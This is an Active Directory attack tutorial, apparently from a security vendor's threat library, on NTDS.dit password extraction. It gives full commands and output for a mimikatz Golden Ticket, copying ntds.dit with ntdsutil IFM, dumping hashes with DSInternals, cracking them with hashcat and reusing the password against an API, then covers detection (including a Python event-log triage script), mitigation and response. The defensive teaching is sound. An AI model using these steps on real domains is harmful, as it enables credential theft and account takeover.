NTDS.dit Password Extraction 

Active Directory
Credential Access

All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes directly from the dit to advance their objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, because users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must already have gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack), so even older backups can be useful.

Threat Summary
Target: Active Directory
ATT&CK® Tactic: Credential Access
ATT&CK Technique:
Difficulty: Detection: Medium; Mitigation: Medium; Response: Hard

Attack Tutorial: How NTDS.dit Password Extraction Works

STEP 1

Obtain required privileges

An adversary must have access to a domain controller’s file system before they are able to extract ntds.dit. Because this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket.
In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.
PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User      : FakeUser1
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-441320023-234525631-506766575
User Id   : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service   : HOST
Target    : DC1.domain.com
Lifetime  : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
 
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
 
# A new command prompt window opens
C:\Windows\System32>
STEP 2

Exfiltrate ntds.dit

With access to a domain controller’s file system, the adversary can exfiltrate ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit.

Note that while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:
  • Simply stop Active Directory (though this is likely to result in being detected).
  • Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.
  • Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.
  • Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create Active Directory Install From Media (IFM) files, which contain a copy of ntds.dit.
PS> .\PSExec.exe \\dc1.domain.com cmd
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
     Target Database: S:\Files\Active Directory\ntds.dit
 
                  Defragmentation  Status (Complete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
 
DC1 > Copy S:\Files \\wks2\Share
STEP 3

Extract the password hashes

Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.
$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
 
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Hashdump.txt
 
 
PS> Get-Content C:\Hashdump.txt
 
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #
STEP 4

Use the password hashes to gain further objectives

The adversary can now use the password hashes in pass-the-hash attacks within the environment (perhaps as a means of persistence). More likely, they will seek to crack these passwords for use in credential stuffing attacks against non-domain-joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.
PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
 
PS> Get-Content .\cracked.txt
 
852e811a65d732c83214b4ff705d777a:F8qN47F1
 
PS>   # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS>   $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS>   $Password = "F8qN47F1" # This is the password copied from cracked.txt
PS>   $Object = New-Object -TypeName psobject
PS>   $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS>   $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS>   $url = "https://service.url/api/login"
PS>   $body = $Object | ConvertTo-Json
PS>   $Header = @{ "accept" = "text/json"}
PS>   $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
 
PS>   $Headers = @{ 'Authorization' = "Bearer $Response" }
PS>   $url = "https://service.url/api/DoThings"
PS>   $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS>   $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate and Respond

Detect
Difficulty: Medium
Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
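The following triage logic, added here as an example and not part of the original page, applies the detection described above to 4656/4663 records. It assumes a SACL on ntds.dit that audits read access (without one, neither event is generated), that lsass.exe is the only process expected to hold the live file open, and that the event fields are available as a dictionary; the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Match the database by file name so relocated copies are caught as well as
# the default C:\Windows\NTDS\ntds.dit.
NTDS_NAME = re.compile(r"(?:^|\\)ntds\.dit$", re.IGNORECASE)
# Paths that indicate the file was read through a Volume Shadow Copy: ntdsutil
# IFM mounts snapshots under C:\$SNAP_<timestamp>_VOLUME<X>$\, other tooling
# sees \Device\HarddiskVolumeShadowCopy<N>\.
SNAPSHOT_MARK = re.compile(r"\$SNAP_|HarddiskVolumeShadowCopy", re.IGNORECASE)
# The directory service itself (lsass.exe) keeps the live dit open; anything
# else touching it, or any snapshot access at all, is worth a ticket.
EXPECTED_PROCESS = "lsass.exe"


@dataclass
class Alert:
    event_id: int
    user: str
    process: str
    path: str
    via_snapshot: bool


def classify_event(ev: dict):
    """Return an Alert for a suspicious 4656/4663 event on ntds.dit, else None."""
    if ev.get("EventID") not in (4656, 4663):
        return None
    path = ev.get("ObjectName", "")
    if not NTDS_NAME.search(path):
        return None
    process = ev.get("ProcessName", "").rsplit("\\", 1)[-1].lower()
    via_snapshot = bool(SNAPSHOT_MARK.search(path))
    if process == EXPECTED_PROCESS and not via_snapshot:
        return None  # normal directory-service access to the live file
    return Alert(ev["EventID"], ev.get("SubjectUserName", "?"), process, path, via_snapshot)


def scan(events):
    """Run classify_event over a batch of events and keep the alerts."""
    return [a for a in (classify_event(e) for e in events) if a is not None]


# Constructed sample events (hypothetical, not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4663, "SubjectUserName": "DC1$", "ProcessName": r"C:\Windows\System32\lsass.exe",
     "ObjectName": r"C:\Windows\NTDS\ntds.dit"},
    {"EventID": 4656, "SubjectUserName": "FakeUser1", "ProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "ObjectName": r"C:\$SNAP_202007311120_VOLUMEC$\Windows\NTDS\ntds.dit"},
    {"EventID": 4663, "SubjectUserName": "backupsvc", "ProcessName": r"C:\Windows\System32\cmd.exe",
     "ObjectName": r"\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit"},
    {"EventID": 4663, "SubjectUserName": "jdoe", "ProcessName": r"C:\Windows\explorer.exe",
     "ObjectName": r"C:\Users\jdoe\notes.txt"},
]
```

Feeding the output of Get-WinEvent (with the EventData fields flattened into a dictionary per record) into scan() produces one alert per non-lsass or snapshot-path access to the dit.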
Mitigate
Difficulty: Medium
To mitigate the risk of password extraction from ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:
  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
  • Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
Respond
Difficulty: Hard
If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed (in particular, assume the krbtgt secret was also compromised). Take the following action:
  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.


MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.